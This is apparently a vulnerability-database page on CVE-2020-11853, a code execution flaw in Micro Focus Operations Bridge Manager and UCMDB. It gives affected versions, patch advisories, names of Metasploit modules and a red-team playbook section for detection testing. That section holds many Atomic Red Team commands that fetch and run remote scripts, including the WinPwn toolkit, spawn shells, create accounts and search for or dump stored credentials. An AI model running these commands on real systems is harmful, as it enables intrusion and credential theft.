CVE-2020-11853
Overview
This vulnerability is an arbitrary code execution flaw caused by improper input validation in multiple Micro Focus products, including Operation Bridge Manager. The root cause lies in insecure handling of user-supplied input within critical components responsible for command execution or processing, allowing crafted input to be executed as code. Affected components span several versions of Operation Bridge Manager and related Micro Focus management suites.
Vulnerability Description
Arbitrary code execution vulnerability affecting multiple Micro Focus products. 1.) Operation Bridge Manager affecting version: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions. 2.) Application Performance Management affecting versions : 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3 3.) Data Center Automation affected version 2019.11 4.) Operations Bridge (containerized) affecting versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11 5.) Universal CMDB affecting version: 2020.05, 2019.11, 2019.05, 2019.02, 2018.11, 2018.08, 2018.05, 11, 10.33, 10.32, 10.31, 10.30 6.) Hybrid Cloud Management affecting version 2020.05 7.) Service Management Automation affecting version 2020.5 and 2020.02. The vulnerability could allow to execute arbitrary code.
Impact
An attacker with network access and low-level privileges can execute arbitrary code remotely on affected systems without user interaction, leveraging this vulnerability to gain unauthorized control. This enables compromise of confidentiality, integrity, and availability of the affected Micro Focus management platforms. The CVSS vector indicates network attack vector, low attack complexity, and requires privileges but no user interaction, facilitating lateral movement and persistent foothold within enterprise environments.
Solution
Micro Focus has released security advisories KM03747658, KM03747657, and KM03747854 detailing patches and updates for affected products. Users should apply the corresponding patches for Operation Bridge Manager versions 2020.05, 2019.11, and earlier, as well as for Application Performance Management, Universal CMDB, and other impacted suites. Detailed patch instructions and version-specific fixes are available at https://softwaresupport.softwaregrp.com/doc/KM03747658. Adherence to these updates is critical to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question is characterized by its potential for arbitrary code execution, which poses a significant threat to various Micro Focus products, including Operation Bridge Manager, Application Performance Management, and Universal CMDB, among others. This flaw arises from improper input validation, allowing an attacker to manipulate the application in such a way that they can execute malicious code on the underlying system. The affected versions span multiple releases, indicating a widespread risk across different deployments. The severity of this vulnerability is underscored by its high CVSS score of 8.8, which suggests that it can be exploited with relatively low effort and could lead to severe consequences.
Attack vectors for this vulnerability are varied and can be executed through multiple means, including network-based attacks or direct exploitation via compromised user credentials. An attacker could leverage social engineering techniques to trick users into executing malicious payloads or exploit vulnerable web interfaces associated with the affected products. Once the attacker gains access, they can execute arbitrary commands, potentially leading to data breaches, system manipulation, or further infiltration into the organization's network. The ability to execute arbitrary code means that attackers can install malware, extract sensitive information, or disrupt business operations, making this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be profound, especially for organizations relying on the affected Micro Focus products for critical operations. The consequences of exploitation could range from financial losses due to operational downtime to reputational damage stemming from data breaches. For instance, if an attacker were to gain access to sensitive customer data or proprietary business information, the organization could face legal repercussions, regulatory fines, and loss of customer trust. Furthermore, the interconnected nature of modern IT environments means that a breach in one system could lead to a domino effect, compromising additional systems and data.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in their systems. Additionally, organizations should ensure that they are running the latest versions of the affected products, as vendors often release patches to address known vulnerabilities. Employing intrusion detection systems (IDS) can also help monitor for unusual activity that may indicate an attempted exploitation. Furthermore, implementing strict access controls and user training on security best practices can reduce the likelihood of successful attacks.
In conclusion, the arbitrary code execution vulnerability affecting multiple Micro Focus products represents a critical risk that organizations must address proactively. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such threats. Through diligent detection and mitigation strategies, businesses can safeguard their systems and data, ensuring continued operational integrity and customer trust in an increasingly complex cybersecurity landscape.
Affected Products (36)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microfocus | Operation Bridge Manager | All |
cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:*
|
|
|
Microfocus | Operation Bridge Manager | 10.11 |
cpe:2.3:a:microfocus:operation_bridge_manager:10.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operation Bridge Manager | 10.12 |
cpe:2.3:a:microfocus:operation_bridge_manager:10.12:*:*:*:*:*:*:*
|
|
|
Microfocus | Operation Bridge Manager | 10.60 |
cpe:2.3:a:microfocus:operation_bridge_manager:10.60:*:*:*:*:*:*:*
|
|
|
Microfocus | Operation Bridge Manager | 10.61 |
cpe:2.3:a:microfocus:operation_bridge_manager:10.61:*:*:*:*:*:*:*
|
|
|
Microfocus | Operation Bridge Manager | 10.62 |
cpe:2.3:a:microfocus:operation_bridge_manager:10.62:*:*:*:*:*:*:*
|
|
|
Microfocus | Operation Bridge Manager | 10.63 |
cpe:2.3:a:microfocus:operation_bridge_manager:10.63:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2017.11 |
cpe:2.3:a:microfocus:operations_bridge_manager:2017.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2018.02 |
cpe:2.3:a:microfocus:operations_bridge_manager:2018.02:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2018.05 |
cpe:2.3:a:microfocus:operations_bridge_manager:2018.05:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2018.08 |
cpe:2.3:a:microfocus:operations_bridge_manager:2018.08:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2018.11 |
cpe:2.3:a:microfocus:operations_bridge_manager:2018.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2019.05 |
cpe:2.3:a:microfocus:operations_bridge_manager:2019.05:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2019.08 |
cpe:2.3:a:microfocus:operations_bridge_manager:2019.08:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2019.11 |
cpe:2.3:a:microfocus:operations_bridge_manager:2019.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2020.05 |
cpe:2.3:a:microfocus:operations_bridge_manager:2020.05:*:*:*:*:*:*:*
|
|
|
Hp | Universal Cmbd Foundation | 10.20 |
cpe:2.3:a:hp:universal_cmbd_foundation:10.20:*:*:*:*:*:*:*
|
|
|
Hp | Universal Cmbd Foundation | 10.30 |
cpe:2.3:a:hp:universal_cmbd_foundation:10.30:*:*:*:*:*:*:*
|
|
|
Hp | Universal Cmbd Foundation | 10.31 |
cpe:2.3:a:hp:universal_cmbd_foundation:10.31:*:*:*:*:*:*:*
|
|
|
Hp | Universal Cmbd Foundation | 10.32 |
cpe:2.3:a:hp:universal_cmbd_foundation:10.32:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Micro Focus Operations Bridge Manager Authenticated Remote Code Execution
exploits/multi/http/microfocus_obm_auth_rce
|
- | Unknown | - | View |
|
Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution
exploits/multi/http/microfocus_ucmdb_unauth_deser
|
- | Unknown | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.